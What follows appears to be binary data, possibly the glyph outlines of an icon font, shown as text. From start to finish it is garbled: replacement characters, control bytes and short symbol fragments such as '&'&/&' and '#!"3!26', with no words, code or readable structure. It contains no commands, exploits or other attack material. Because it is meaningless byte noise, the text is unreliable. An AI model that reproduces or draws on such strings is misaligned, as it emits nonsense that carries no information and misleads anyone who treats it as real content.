����5;A_m2>76767676.&/4&+"&'&'1.73#6"&'5#"'5#.=#3>=##&+"#!.�,DND,'&"


�	#!
"&Q���MfL�
7)(6�[�!f ��*D((D*
#



�aa

#

`_7JJ7*����+WW+=��>*W�yZ[y��3<Ex���0#&'/5&/#526576762265676'&'&"&4623"&462'5>=#5#"'5#.=#367676?35&"'2676767656.&/4&+"3&'&/.173#6"&'�-
	;I
	:$
$	�	
	%d	86"#/	0#


5#*
-9!#0$




P

	
&[be)gF
4:]wAAw\�bLW7LL7WL%#8/9/U�MKR5$JJ#����$JJ$6V�b�BD;E"#	K&'	%'
���.7@IR[dmy��4&#!"3!265'264&#!"37!26=4&'."%2"&46'2"&462"&46'2"&462"&46'2"&462"&46!264&#!"76354.!"3267>54&����
�&%"\l["%'�


>
1


=


>


1


>


H#��~�
8'�t��	[686�
(C$&�5UV5P888888�4([[%'w@)OShyL���Z^jv���#"&?64/&"&=4'5&353>=4&+"2'.'&"+"23!267>26=4&3#"&=462"&=462"&=462"&=4627#!"&=46;26/.6!26?>;2`
	!@

'
	s	
(s	
h:!


S
�
S��Q*��

u		t		r		�
�T

$

(

b}
 	K		)	
 
�
!A	
�o	

	n	܀
R;!		

;

��

.

;
Mn���������k


	)		b
	L
	)



���$-6?������%264&"#264&"264&"#2654#"#264&"7264&"2654"!"326?6226?6226?6226?6226?62326=4&#4&+5&'!5&'#"#"3!26=4&%621#!"546#!"&=43!2'!"&463!27!"&463!2C	I	{
I�
.	&��)!	!&!	 (		 &!	!&!		!)#

�
	
#


�(�(-��
��
+��


-	

��J�		

		

~O(





(O��="�	
	��	�#��



�!=1�


9���P";;2654&#"+"&=4&+"+"&=4&+";;265326=4&�(:		'!�




!% 	6(��	��
!	��		��		� �� �	��7'3=W3'#"76&/76?6&/#>4&+"2!#!"&'!&76;22>7>;2�7-	
y
;	�
-D

;\
:
9��	�5
?=��=	
O

6TbT6	O
	 g]
,@	�E	g6
�	��,S�	

	��	�b$�
�			*E((E*	$����!.9DP\gr�����������)}�����	AO���?6767674'&'&/&0#&'720&576761761'57'421#&6&76'6"&6'6&4#476732'6&'&'6.6'"5&4?6'62"&66"&6#"5"546'6?6/4#&5476'>&='62&54'&546'6&6'63&54026".'43#'&7"333?6/&?676&'"75674&&7676&'&""&5'&/&3'&5'&74/&'&#3746'57&'#"'3>76?4723>7475&'#'7676?>'.+6?6?>/&/.'&/.+376?>76'5014'14/&/&'&#""'&'&'&&67676%&#"!6/&'&5&?65.7'76?6767>&"327'&'&'& 765�+	!(%<%S
			5
	
	
	
E		R#
	�Y%'$�			$+T`$



	
)$3	j	8�1#,	
4
#r
 	
%0

X

�)mZ]Zm�) $
 #M,r
+H/2,4\�QDo
Ly	K2`,K)k

	�

	}
z
%
�


#+�
	,6#1:			
	
%@	
�	'!'")/+
5B
���>22>�	���)Ld���7"&'267&''327&5476?67.'"&'&'32>54'%32?3'767&'#"'47#"/&'&'32?67.%327474?67>754."70327676?67654'76?6767>&&#""2>4.'67'&'&'&#&�&B 7A9 
x9"	-E%y(C&
% 7 ��?(
$/$$W	! 	
?(
!��$! 7@7 �
 $!=2KX9F$			@7  7&
-)d
 -("#/"9"%*e%
9,=$4,$
'
!"9!�'15&)
&37-(3
;�'!9""9!.	' 	"
2#?0( #'-6I	a	
1"9B9"�1'"!(��_!'-39?EKQp|'.#%"?3!2>5>'4'?'?'?'?'?'?'?7'?&#"##"/&"#"'&#"7!&%!264&#!"Y:	��4!7!d!7!��8,8,8,8T4)4)4)4[8,8,7-8U4)4)L4)4)
 $'"+%P'#���$$�%%%��
���!8!!8!t

	
��'9'::'9_$6%=6$6m':'A:':f%5%2$6$?	���%4%%4%�������%&>&'&'&'5&'.##&'&/&'."#&'&/&'."#&'&/&'&'&###&'&'5&'&'.>36?676767676767363636?636	676&'&	&676&��	0�0<


"


!

"




"


	


"


"
	
 

�R���Dn�,	GC�m
=8	��	>8V

	

	





�%E"��]&
��"��+JOTZ^bfjnqv|������������4&/#'."##>%>&'.'.63763!222#.#!"#4756'?3''73''7'7'7'7'''3'77'7'77'?'77'77'?'77'77'?'3&j�j&����+?
	, 	
�
H
	
"��"	�*<1<e%O,2	d:1:1r/:/p0:09/</)>/>�:0% '/://)+0=0

2=$!:	$0<&$>
%)Q$0ARRA/'��2'�		7)!�H*;2;%%+3H282090192F/;06<0<l$K@'19/
/(H=+1<1%	3<%#8
	"1;(	$=	$*���'";26532654.'67676#&�8^8
�"1#�
7^�' (6C$8^8��
��##
38^8�$(/"	���#)/5;?t3/&'&'#&76767675#36?/;'&/7&/7'5!!5#!53'#!4&'&'&'476?676765QM,%

!0�z	.$Wk{�WL"0W�W/���&����5?
!!
%
��s_

	�!0�Vl$.0"Wb{WW{���rr�o 		���=A4/4&#/&'&#/&'.#"#"#"1767674#3�	*3	

")!-J3��&&p!Bb	
	57
�

	+Uv�W	�N����
3JYflrx~���67&7.'>>'77..7676765&'&'&767676&7>76&#"&7>6&'&676&'.>'>&'z,5
$<5$��''4�eugdCD$�gwm~]>9*%T:5_s�SEB"#A;f}�Hm��*,+;;6(Q9
74N(,.6NM+i

�40�
\13#��	=&�i-�+'�500�"  L[QCBceu�kG
$@;eV^�$_[UL[	$#CERt^VGWC=?Q*5?.I(:Eg(L15-&G+.�15`�14�
�/(�/5�9	$����-V��	D�#54&+54&+54&+"#"#"#"3!26=6&232642264226546226422642;#463!2"&54&""&54&""&54&""&54&""&54&""'50326546226546226546226546226546237!3265462265462265462265462265462327!!53265462265462265462265462265462327'"&54&""&54&""&54&""&54&""&54&""&54'5463!2N6%6%�%6%6&6F
6�	
	

			
	
	
	�M  ��n

"
	""
	"�����
"!/"!0!"."".""
	"/"!/"!/"!/""/! �4_'89'8  8'98'_7(��(7e







_""
























"�)��=!!!!!!!!!!={!!!!!!!!!!W!!U
���,CYq�����&'&'&/&#"332?6767475654''&'.'&67>76&676?6567676?6'&'&'&'&%&72?6?676&'&/&4'.27>'36'4/&/&'&'""67654'.676764'&'&'&276&/.?676&'&��d	�f �]w
�i-$:7�jcTRl
vTW`n[Xc�E	�	,M@
cIE0_>�)�1
(['�mK�(!E0
��M

M��^~��(-�	`

L-�
�lM'�DQ�nD$�Q]	1o\Xe/,�]U]�'(:7��`J0
�Mv�
	
�	
9
B��6w;

� >	b2O+I�@
':!(`
(3<W;�
.L
���
(5Z67>76&7>7>/&7%>'&'.676&#"&'&"32>54&'.���
)0	��$	<r0�
�	5���E\"�,*H@D�[D}2G�_j��PA=�#	�1q<	\��	1(�=�"[E���5	�7�KV�@DJ+(=@O��j_�H%��'
 }��4DXhs���������
)8HYeo|�������6?656&">&7676'&'&'&727>6.?676767676&&?67676?6&'&#'&'&#"767676&'&/&376'&'&'&"/."3273632>7>65&'&'"&/&767>76&7&76&65'&'4&7676?67>.&"?6'&"/&'4&676&'&'&&'.727676'&'&65'.6766&'&6763676'.7>&'&'&/&26&'.'.7>776765#"'&#&%&/&326&%6/.4?6/&&#'&>&'.674#&'>.'"6'4'&/.?676&#'6&/&/""&#"?276&%&'>76'&&76/.>&%>/4&7"6.%6&'"64.7276/4#&'"6&'0>&#&'6&�N


��&	,$(
	(O 
6=$!
	C7. 
"		

D

;		
%  


��!

*K!			,�	$-<3"	

�

#7l	 
`
&#,		+Z	
.
�t	�"�"
	�
%+

�
�	

	��	V	�	
��!!		7
;
X]

O
�
S

b		

%>

7!%6�	6+\/
1�!\#(

		�	8)6*(�	
	
		

	
�)
	$	-V#	
�
%
�		�

J	 	�

�

'
0	&CS^	[-�!A	{
b	4%	
	%���/=&7>'5&7676?6'&'>5&'&'&76767�\{P2DlG5-+ 
�%,B

 -*[1A	 1
U)6cP\X�-"(2<24"Z=.2,")!
0/!#E
���3@Vh��!33?3#'#'3#'3#'3?3#'5/&'1'&#'7>5&56'#'.7""!27''.=267'2763;754&#!"3'P�w���-%I
~VQ6�!*3 \o'!3.n&5l	��
%:,	H���%$."RD
RQR#Q6&M�U2���8$


C
&	r
v&)�����%c���&'&'&'&'&#6'&'7&'&'67#'&'&'&'76&#&6+'&'.6?5>'"76766'7>567&5&76765&6?6766?7.767'&'&'27/&'&'&'./&'&'.''&/&4?6767676676%7'&'&/&6767676&5&'&'&'&/676&'&'&6767676767676&''&'&74?&'67"7727676'&'&367676'&7676?767676?>?67676?&676?'&'&'&'&&/'&'&/7>'&&'&'67'&'&7>76?*6''�	!"
!

	
*#0/

&"*	&	: &-*
	)/4	,

!		' 	

		%6)+!
��

+BP;' '")2A)#.A,6'(
.,1	
#
$9XD5	!&#�(%!/*
	

0%/��.		

	

		
m"(#�1	
4)
2�/.&6.
%/


  -C
G! +	 	)$%
!
$"	
"+

		



"#>H7�	%	)	 "/,�,(*	
$,
	)%&2(
S	

$/6)
#8KB')"
&				
."	
� 
1+>$

#
k

���� 0Kr�����%!"3!26?4&!"3!267676&!"3!27676&#65654?6'&547653"#&"5'&76&76'&746763'#47654'5&?65'&54746363654'&76'&7676'3#76%#&76/&'&76'&=3#&76'&76'&=335#"%!26=4&-265'4&#�|z��0	�
0g�V	
Q

��!!�
f"	�
%		Y	����X��i��P���	
6E77E��*!5+12:!+��
'5C3*!$!/)#�
4
	
$)
*+"�/-6! @s,
	�	 65&1	!,%�6)!2' +/
:#&#4D%b%+(5	���d&'&'&/4.6'&'&767>7>7654'547>/&7>76'&'&�B!P�P3+,C
2

B

S

*$ 
?Z%
	B?
>R		"?<�%":G')(? EI.;8p-.CPNDF(
j|* 4	_ORIA
a	
UwA-	y�e=@8C+)��,
1:CLX74.>7&654&"2767654'."&4627"&462"&46226/.+M"O$&DO$%93,3F
P�&'**FH�HG)+''�"1	
		�1K='F-'F-
-
VDGQUHG)++)GHUQGDV��


.		=�����0>&'&76?>7>?&'.'&'6�
A)
#.:	>,pq/Z4)
(!+
KT29+&	F03D5=;7S8(%Hq,@.JI1)B	/ %J��7L]��&67&45&'&'13'&674674'&'"014675&'"#"267&/"53&'&'&'&'&&/"'&/&/&'41#&/&'&'&'&'&/&/&/&/&#76?27676�
(<.$J�-6#)('0
 0%/)	
#*yB"0%-+(yQJ)<(��*5	2E 		$
.,!$>F[h{��
E#	"HJ
<!77)bU�p�p^		Z"9=&=&x<%( *Dl&=%	;%`(&<	.&3 j(>A3 �!	
3=AT]TaEO#'��	%"196*#
��sI=����1E%&'&#"'&'&'.&'&7'&76767>'#&7676373�Wi�l�22	
/-	,Z�}�wb9$�
"-0*	!#!!�>Fq	75?($2'(#)>Iu1,1)Z���)3!2#"'&'&47676;#!"&=&32�@	lUXdj[Y4554XZj���m^\9;���b�/064X\�[Y46����42XY�Yn�&'&'&'&'&'&754&/&"'&'&54754&&'&54&7>76227>7627>=6&&'.#&'&'&3!26?6&'&"�	
.w	

	@	
	*			v-
		#*(<>&>&>@%	�D "%"(!N9&)B)&Ci<		 
	

*	=g

%%

&&
	F
	$!

p		p���$+6?FLT[dmw��������������%7&67'7'7767&'&7&'&'&'67&7&'667&'5767&'7&'77&'&'&'67&/56?'&''6?'&'76?67'67'7''67'&%6&%6?'%>6?'%>&%67.7&7"4?65"?65'&/&#'&#"/#?6764�
0�!0��)0�
)	�)�		
	�	(
)�(	D
(z(�
){		
	

(z
m	
'	
�''!3)h/-
�<
 ��
._	��	
)
U

��
	2^.4�$I��X�;,X���g5%
	3	38,3!

+	#,��
	
:	+d,*r
**+
�
+			t

+	s	*
**��,0
�6 

"6�
26M
:�
,
#"O"#�
0�
n%�r2&�%p$�X,����#+4EN>767'%>76'6."&462.76.>7.676?>>.#EC�w0��NR ��B�q�?BP�p$Eq#*#*+

		#*#*~�ro�1�9ǃ��w�i/�ilO  $$!!w#*"�	
Z#*#+���%-6@JT^hrx����������������(17?GPXapy&7&'&'546.>7.>7.76.>6'&'6767%'7&'&&'7'7&'&6'6766'&>..>7&6767>.>76.'.>&6.>7.76>..7676..>'.>.>7%7.767>..>'.>%676'6.6.'.>.767.>7.>7>>.VQm�@�-
!4
�=&&N'B!;9Q`CF��=
%$K(?4ZF'RkebP UF'RekcWt_AD=97��<Z;
V	%
�o�DUN>
{
7	��2mJ45~		=6
+��
$0
$	���oN68		�
	
 
'			�
��/B		�w4		F��kcbD/;QU�YDD!:(ORi�ib`E0:PS��70A :�40?":':(OQg
VEB(�5UPN/i	

5��*�6
9		�\	
6A		Ea4%!>@4		?		L
�Q�G�4SOLe,T�t6�� @A?		1		�"y	
(	���'7CSdu�%&'4&"&'36767'7>'&'&'77676767'276'&'767676?76'&'&'&/7676'&'&'&'77676?'
*fD"' '"Dg�

 3k

	:!	3			)6
	 

		
8	
	
�V*
	?A|$e`nqrmad$O!
*
*"		"&)
�!/.'a"

~
		!
W		
M

	
���Db����)%"2>54'&7.6&'6&'6.&#>'>..".&#!>'7>""/.?'.>'7'.676/'&'&67'&>76/&"&'&6'?'.>7>'>'67>&'656767"&'6.&67'&>7>3#'6#'.467'3>;&5&62636�
.1
	%4&	$!'
K*K�+'			i .
	

b


 

*Dk.
 %	



	!%




].{G]�� �	!&!!#
�	$0	!"0#($��#�* 
	
%
+
J
	�'&	

!	




	#
		
	���/7/��,7/f
�dIR_k&/&'&'&/#5&5&'&'&'&&'&'&"76?6767676%.>&7>.767�-*
)��(P3

A3c2#DV5;
. � "#"c$	�	
	h9<
%$6 <,V` /
"A&-	!4-*	|
!
���j�.'&#&676/&'&'&'&'&#&'&767&'&767&363676767627632763&'"&'&7#�k_&
A	6
#
#
 $7


	$

3U)	*:-+\5AD07
@\�9"�](
��	
MM>>
	?# �F[/"=L7G<K65*v�$)
PJB=61+& 
S�m�N-,"Ec\FUG5H��Q
#2{9gB_
a)5,:S *&9#

��:O&'&'&67>'.'&'&'&'.''&/&'.76'.�U/9*1xM


$
6^&#
	1C%"K}! 
<p* 
5A
.8S#[e0E8#B5%#,"4*N	|�F#;3g@
&\[&V$g
����#'<qy!#535#535#535#535#535#53%!!!!!>32+"'&57"'&5'4;2;26=4;2;26=4;2++"&57#"&5!5!!5!�t?����������������k���u���
	X	
���j��R���o�%..*.*��[�\o�	�T	�////G	��	�C����%5Uy�654'&'&'654&"7>7'&!"3!26=4&6'&676&'.47676'&/7674'&4764'&76764&#6&6764&76'&�54Z\mm\Z36T
2-
��Z�C	a			

	�
)
	m^[9::9[^m�8R
 N5'��/		*		,<	(	*

(	-

)'	-
��Q$7Hk�������%63276/&'&'&76?6&+"737276&'.%2;676.&?6+";2676'&'&'#"&'&76765&'3%"#";2764'&'+"327656'";24#%"+";26'&'6365'&'"&/#&"362676/&E/�
)$
		�
��':'JKq! l,==��
	

�	

		�

�
<__
�
zC�
��
�k/0a�z


�2B!
_^		
D	EH
-ME		
.p(3(#I%.+-�1$4�)J0
<N +.')6,�	/3RP9C-K"*,4)
-
�

�		
�7B*! *'�r>k�.76'%&"'"76767676767676'467>&%676727>76/&/.7#'&'&6'&'&'&/&'&'&'&'&'&'&/&'&732767>?6?6?�
!��

M�)$ )	('6! 4'	H�
��#+�+
B�N�f0	,�9	

	
> 	
	
0	
	
(1
}}
�� 
d8
-
3 #
&	"4

	
''$>0<$

"^

$"	
!		66S
	
�^Ld|�"#"/&'#"'&56767&'#"&?6?6?&'&#"32673>76.%6'&'&5476.76'&'&5476.76'&'&5476.-(
2,
.*
#-$CJZV^m�W)N�b%\	%]%�
	+
#
#,	


*


#*.94  A)$"
	"
	
"

	"

"
	"
	
���%.8"#'#73676&&/&6;"&462!'72��k" 	

;;�%<�F(�<TUvUV�	����
I��s�a`0&(�2c�^

O.^!�����%6GYi!"3!26?6&%676'&'&'&77676'&'&'&7676'&'&'&7!"3!267676&"3!27676&#���	H�K7
�
��@l@�D�
G4!! %+'$": 	 #> % #> �[HH[�
���Ks��"7'.547>31232?.'&76?33533533536764'&'&674&226/.'&/&/46"276764'&'&"'&'&476762�dVT12;8_#,<  <,#
,,>7&				%
T1321TV��
		�vfc:<<:cf�fc:<<:cfwn^\6776\^�^\6776\^�21TVdl[X-�	V9)%#--#%)9V
��
L7PF������FQ6M
�1TV�VT12��

		
#	
 ]<:cf�fc:<<:cf�fc:<��76\^�^\6776\^�^\67����#>Gc~�%#"'&'&/&'&'&7676&%232764'&'&#"72"&46367654'&'&#"2#"'&'&/&'&'&54>"&462� `;t�1?&F>1,BK(D7vaX;8�|D$<2w[S/,53X[ix�Y(u.@@[@@ˆia65=:egx~^e5:/HJ)D7o_\6823\`{.:"@
B+]� -  - �*-S
	
/	E-*R
�	>21�EC')7gI-�2F11F2�kNA?jfWU23 @Ed<"
�+*GIV[58@	
	4Oo;�"��*/;JWcs���������%2@Pd�&'&'&'&'&+"?67676%"&5&767&7>&'&'&7>7"'&4762%6'.676&'&4&#'&'&67&'&7>7&?>'#&'"6367&'47>'&5&>5"'&462'"'&476&5&7>&".>"'&6762&7>3&'&76767'&4762'&567>7&'&74>"&5&5&7474>?676?>&/&#.4?6?676&'#?676.&7676&'&/&'&'&'&'&'&'$+ /
1"-%_WR32-(
iE9��
	
		'	

�


	


,

			&
	#


	�q	.+/



	
	"	
		H9$

[i�P1E{d5	d
	
�
x

�	!	
��


j
	l

#
��
		T	
\	�	�

��		M1!
{	c�
j

�
	y		D

	
		J5!,	

E�&�����&6IMYe����������$39BMT]fm���
-5@NV]g���	����:AFW_tx������1131&'&#5&'7;73'756'&'1"5'&271#6&'&'&271"6'&'#'&#""27357271676'57676'56736/&766/>&6633##"'&#/7332716767'&'1&'"'1'776?6&''&/#&=#7;"01'&'&="36.'27'0&57.796'"#'67301367573&#276766376?6&7"6763#/"/724#''76714'6.62?17'6367''7676727676'6.6656/#0#&'7>536'&'27'01&"675?6#6?'#4/57374'567672673'3'5#767644#'?6.6676767#65'2'2"&462".64#7676?'&76763#212767473#&/&6&'674#&1767676&"#&&'&&4#"#'&3#&'?65216'/0+"'5&5701761"512"&?&769267&'&#'6?"&676&#16?6337652#0325&7&'&/63&'#54'&'9&7&7567'&'14'&'9.'&6?5&76?5251;3276?36371'&'&7431437673536=6571""1"#5&'&47#2333"71"3"1'4&31"'&#3'"74&'&547354'&#.737675701501'&5&?6'"1"'01#&'"'4?5&'&"&5&?67'47673567673737>3&5&47&''&#/&'77657637#9.5'#"'"/#&&=#&'4?354'&'&+6&/#"1&54?636127373776?>&76'7&/"/6'3?7'737"#&+&#727657624'7&72'6'51'&''&'53'7'5'6?6736'1&#"676'4'.'7567665&74763231_�B$9:<j'&
4:9@UP"*+*!6"";'
;4
2W		

	((
	!R	
�
		
	 z

7

	5�!#B*98M#
:V2	(-
			
		))-
= 

jW	


#
('4		
		j	l5
6

2G
 


		0�	

		
(
;"	04
0
	0
	
�9/	
*	
		<	
	+	

g





53	%%9

	
			
E
		"			1	>F\],	
5|m

�B$	


)


"	=


'�(I!$s
	e
	T


	K	

'

	
F	

J9


l		h			


/1
	
5�

E

a		



3!g	
	
		
		!				4	4
d


	




;	

		
	["		6		
Q					1	
			
,
 

�F)(;s	
	
"#
;-6



��y*4>HP]f{���%.'&'&2?677>76767'&'2&67672&676'&'76767"6767603676566767&'&'&/.'&7637&5676&&"76676'>'.6776�I�^Oi;**LD2&#	7
Tl>aa+.&kL2#l>
!6
-$ L$/FM!D
	T�D9<-/
><0�	�9�

��
�
8�q�C p.!f#&	"K
7'#
$9
(
M4T

	(<E
�
',76.`	
���t� ! @�1�I
�c$-6?HR\fgo|&3!2674'&'&"&4627462"&"&4627"&462"&462&'&%&5&'&&'&'>'6'&'&'&1&'&.'&#&673�i^:7
"�//OS�"=('s8


=$�C%)#��

�.%
�R	�
,P81bZi"\VT9:��""r({��##�#�Q%��0
�I9#.��M]m��."!."&462&'&&'!./&'&'.76!6767676654&'676#";26=4&476&/.6?6'."33267033>&?6'&'.76'&?&/O�Oc�&.H�H(/&


!
9M1B '
} ��		��



$		


l
:**:

�*#S.			
/'&<2"*'+�$#)K %<�				�

	,
	
		


���,6Jbw!52767>7656'&'&6'!!"3!26=.66&'&/'&'&'&22=0#&7>'&'&2=&7>'&'&���"*]"
!@��
$)7��>y4#*�
$'	�
 (�
!"*?-34	#.FREU1:i
*,%Fn#K6D:fm!!	�D(/(!G')7"&9#���EU�&'&'&#'"/&'&/&"&'&767#'&2656767676'&'&77366?676?66'&'1&'&'&>7363&'&'&'&/&67�4/K%11
	I


7"7"oC5�W]'"�^7��16/'?"+5

$%	
C5

$&
&0$5	
"'�L;5(!3?

$+"&.���F("pBIK��"6++5!0	I
	@


(
&	�:)7FUer�������>75654&#!"%6'&'&6'&'4'62'&'.6+"'&/&2./&'6'.5462&476"'&'&767'6?6&'&'.767676'676#&=4'67672/.6'"'547676'&762&%#"'.'&'5&+";2?67>7476=4&N��o
�\!	+
+0		
	:

	
	
\!		

�2'#x�LR�\2l�UL	&R�U
@H&I�j	�E
C h"t			]	
	W	

	Y	~	
�	,_

*

	yORGg/

Q�O*##R�T
l�U#���#4GWo��������$1AN'&'&/'&'&/'&'&/'&'&'&/&'&'&?"&'&7676?676767'.76767>7'&'&67676'.'&76.767>.'&76&'&5&7&'&76'.767676%'.'&7636'.7672'.676736'.767667&'&'7.767�!*
	$'
!*'
� )!
-"*

-

F6!�

%
	

q 		�

	M
�		"

	�
�
!�&0&="
/		$[
�F'		
�$l 	 &Y!	  &�!
! /T!	! 
OH% 	,*6�:'4+

�^H$
��#

�	
"#"/&.(
'!*/		"#1	9�0\8)5,	!!.:
<;	
=%�t&40���hXS���&'&'476'&'&7676>=467667676'.76'.'&'&76767>'&'.&5&'&'&'.76'&'&273>/&767367>367676232656&'&3&'&767676*P?2
)30q+
3)&F-/p+7,J/7N,804T90%.:.
&&
,6TS28&	&
<4
$<S(2%:!*��&	~;80=(7.~#^(UjNp�vU,*0.F
:'
&).=a��

0.I5;@L.A	;)PH@dY
M�R"
.X#


!$o6
$�� IK7)'��b/62

3u'	�j�R>\t{��6&'#&'#27676'&>7632765476'&'&'&%&4'.76767'&&/&/76767>766.676?"'&'6�cPam	
 )N
:6
"L4��
4+.*_	
��_Nx$D
	3G?G?R/d^�!*
KWPX)!L'B1;L-Z>=
=*-&"	5Y<	
 AJ$<.SLO(

-&5	)4/((W'I#9.#!#
��&w.T1�,T
-NK-�j�SH`v���&/&7>&'&'&'&'&'&67'&#.'&'&636767"'&7&'&'1&'&6&'&&'&'&6'&'&'&'&'&'&7>?6766?&'&'&'&".>5&/�)T})/1�	
*E 	#I.D"
	3�w& +�i�

	� ��U"�o
	�
	
	_	"�!�72&#	d:X�%<)9q�70��:_1&1 "2	"	#˰)!

�		��%
g�o�
�
F
d*)%
2�� x�	S�isU19MU`m���!q��(:" #&#'&"&; 27>76?676&&'732"'&'&7476;7"7>3'67'&'&"2>4.&'&'.7'&76;67"54627'&#1&'&/.76&7676>'#'&'546546&36727'"7632&&#"'&5.75"&=&7'&75&76266%"2>4.&'#67/&'&7.6765"'.7'&7.672./"&746&>.76&2"#6.#.'''"&75&563'&676?5/.5.?54631>>7>%'&'&"&'?&'&/.6?6766&/&'6766?>6'&/&3626=4'&#"Np�?q	&
=�!�Kd3�
8
7��owU��&B(&CLC('B.
				$	
Y

						

	
�Q&B(%ANB'%A+
		
	





	
`	







�

83tE.-.

 
\CFW7 41a16"/)("^]
5O&LsEr9
!!$ #0�
��

	s��&CLC(&CLC(�
			  �
	

U
	0C			


~&AOB(&AOB(s
	D
	

	
	
J		


#
B	
MYU*��"&
HK	,$-$! 	*!,O�!	��4A.+"+;7676767546;27676'"2>4.u3#�.M
1g
	�
	�'!=)F))FRF))F�1(*/51	<	X*)FRF))FRF)���f�U-o�"767654&'&'&'&'&'&4767>.#.767>76'.'&'&?676&'&'&'&736767676&'&'&'&767676?676767676?6'&1SOL/0bRUQM12eR		*,!-;$2*�17


		
	
9- �L.%





	
i20LO�e/.LPUYe�M	, 3,#"0,'	#n7!	RM'$
	�19
	
! 	




&�h�Va"'"'&'&'&'476'&36676?6?6'"&'&76?6?>76.#"'&76?676767>?6&'&'&767676?676?6767>763276?67>;676'&'&'&/.76?6767>54'&&?6767>'.&76?676?676'.&7676?6?676'.'&'&7676?676?6?>?676'&'&L
"
+:/#A34'<
 
	#		$	
	  ')	"





	-""
,
##" 	)



!
	

	
	
 3

%+'E)#+�		)	
$3&
*$).)/
%
 )0()
, 9!/$#*&	"%&	'<$'

			
	(


,
	 



	#* +
	
)
$#  �j�S6N��%&'&'&'&66?65&'.27676&76'&76'.&'&'&'&'&/&'&327676327326'&6'&'&#>/32,(	:'96/05: c,.%'1IDQQ><+M
nMH.3A$&H
-;>
%{X_<

	 
	70	
)0F
���G

.	.
!*

f
�

	0#$#1O	
	"><@;I)&*(B/m�
�M7S,370N23E$&'.1g
	

4+xN(	
	
* 6�f�Rw�������2276676=6454&76'.'&67>7>764'&'.?676#&'&'&?676766?676&'&/&'&/&'&>&.62%">&".622674&"&#!"3!26&675&76&p	

	3
	KS(� O
			
55

�


!*-!
$"#%	+"%;D��,6M76&-.@,.��� 8e	W
1N7
&�& &

<ck	["
,#	
U	��	S}?+	

��	+9%D@l�,&66M8�- /-@.�+J+
'���g�o(1JW%4'.7676?>'&767.'&4?6762>.'.'&7>>.
*S):9(ZP(O(c�>N
*_�_� ./@.-�L5VBo@7^=P!�
�*GTE(+HRE(@)S)df+$(O'_)WA;g+a�_�-A..A.�-FmAk;8[6nP!�
�+F(+HSE'+F�i�hGVds���%"#&"'&+.'&>326'&'.'&'&67676676362#'#>&'&%67676&'&%&7>.2".4>!2#".54>&'&47>
'nCHx6IJ4-74'	
k	--3v*
\Z	L`1<
?+
87+78*)��D0RUA.�o2D131+B4�8)G))GSG))G�+G(+F(+G(+G�4;=�Z_(#6"  m3_*!!ID2,R<	!6R7t(EF5GI.E8[; %:X<@)��)FSG**GSF)*HSF(+I+(D(!-9���i�R1Ngx2 '&'&7676474'&'&"676766767676767326'&'&'"'#&4?6'&'&#"45'.7>�uqBCEBru��uqADDCqt<&(1�]-;XMd#.�*(0(3@J
�r>�	
C""$(�$1'1RECqt��uqBCFBruspBD�<	,"ba0%Y4-2G��3
I(�=RRp\	:1!0*3%*"
�edU&]{���6767>'&'&'&&'&'&76?6'&'&76?676767676/&'&%&'&'&'&>?2767676'&&'&7676765&&6767676'&%>76?6762674/.�/5/VJn' A/NJZ^w	
	

4LZ
		
	

-
&��'sV	
 ,4h#$.(�	)-

�
�4


<'
<IZ.Z.)uCJ64��

�)# 
	
	
	
		8/�"57U�X
"
J78:nbV^V02%%/' _ 	
:	5'�e�W6Ou��&/.67&'&676.'&'&767676'.#.'&'&'&632"'&?6767676276'.'&"76?67676&'&"#"'&'&'&''&'7676'.W"U5",s:Ga.00./2
#9!��l~b��5��>[3y@;J-[-"T		
#6 -		�
*%"(G&

�nZ,I9*)	
#%+> &%C@?B!,;9
.7'7;0A:I�v2E
$,07G4O�z	�G.1J��)RA
	
)/L�
		

'


#
�;%(

%B$!����b&'&'&#'676.'&&547656''&'&67>7676/&>76767676?676�KC\UR87	$U*-au	9(VJ!f,7

(>{,=9*:9$44$


		�V;3	*mp1 +FJ+S@ 7)5


	o�N+


'@%C)	

%;;6&
	#J&?�d�^8G]>7676767674377672.'&76/&'&"'&'&"32>54.>76&'&� ),
`3-v:296c!"	
/c@<nK
$<O(>E/+m!5 5 6!5��8c>kU3'[1 0wA47S%ZPv;1+-9@uM.\;NE<P'#� 5?5!6!3�>kE
E
#,A';4B���L����32656=/&#">767676?67676?67675676?6'&'&'&'&'&/&"&'&'&5476&'&'+&"&'474&"'.&/&"%676&&'567>'&&/.76?676767676762%s
##�		

"'#^3`,
f3<7+	%"%1&9!"HE	"�͜��
�p~(:��4}d"?N���'6


 " 	
K.0�N		�P
B6 0		k"&&6AH3"l	�6&�)
%��DQ
(R 	
gx$�iNR'7T.#+'"26&'.7676767>%63!6'.'&?637676'46'4&'"'#&@
e�f�C

-�F'

 ')#6H��a�%mDHK�Q�

	�	YI�IJ


 "	4%r�{>^�
	
&���^�Sr��23265&74&+"'&"&=6'&7637363626=&6;2"#&'&'&'.+"'&'&7>=4632366'.676;727>.36267>&/&#'".7>7676"#&"&54>;72/'#�SS�&1cW'//�,K/(
pI~N<asP.	$S

6MR>
HdW"		j523VoS
89&*	oo28! 0
,
(
7J%"���#�#� +��8;1M,D9	"&G\	hQS0B%"���*>6L(3D1./ cmDG64 
-'	�
�h�TY~�76?>'&'&'.547676767>=&'&/&?676767676762676&'&&/&'&'&7>76"7676'&'&#
,)&/or\KR6jA!	'(-18*(%"%M+$�'0"! > 	
-
C*n:8@/
&�9VC0

?

/,	
4$	Pj.L':0%= A6X'/>-'"7		@ \J$

0���t-:IWky��������&09&'5."?2&75&327623636?26%"2>4.'&/"'4?6'&/463676"'&'&4676&'&67"&'76'7"&'4>6&7675>72627"'&'&6?27327&'%4=4&+32265&?7>/&'5.#""64&#"6.74&">'"'"6">4&A	r�&N�;	E		?�>
% ��l8_89`p]79^I1k.#5x"1$:I
$
@	-h0'?#'&
#7 	<���3a-Hww
�		u(�(T((� �$�
�+U
wB
0/$8_p_68_p]8h/9:-	K#)l/'"n$-49!7Jd%&4%c)4$(
9O(CA@��
!C�
@5�D()((1(�1
-0$EN�����%J�����%#!"'.76?>'&'3!27>67>76?676/&'.7676.''&/&7676?632?67>767>7'&'&6767>6?>'.763232766=4'&"'&64&"%6'.'&'&�#K�

	1)	�3*�g'P$>#&	(

W�C?>(ND"h
��
!,$%
$/�|L�D/�Z
%( �5H#	0_�""�aD&/$?*DE�  l79$D"	��r$$C�u
3#FZ
	

%!T$B

��	z	
#@	G#�h�R"X�3732'&'&76'546;76761#"6?62>/&676?>&#&+"&/.#6?6&'&/6;26?;2'&"�n� @Dz�
	�~N
F?L:0dS
K&3�*7(	
3<
	�13!	:l
%$

i]
#d	
	<Rk��\x[�72�b{K��	
��3�	a)�(	
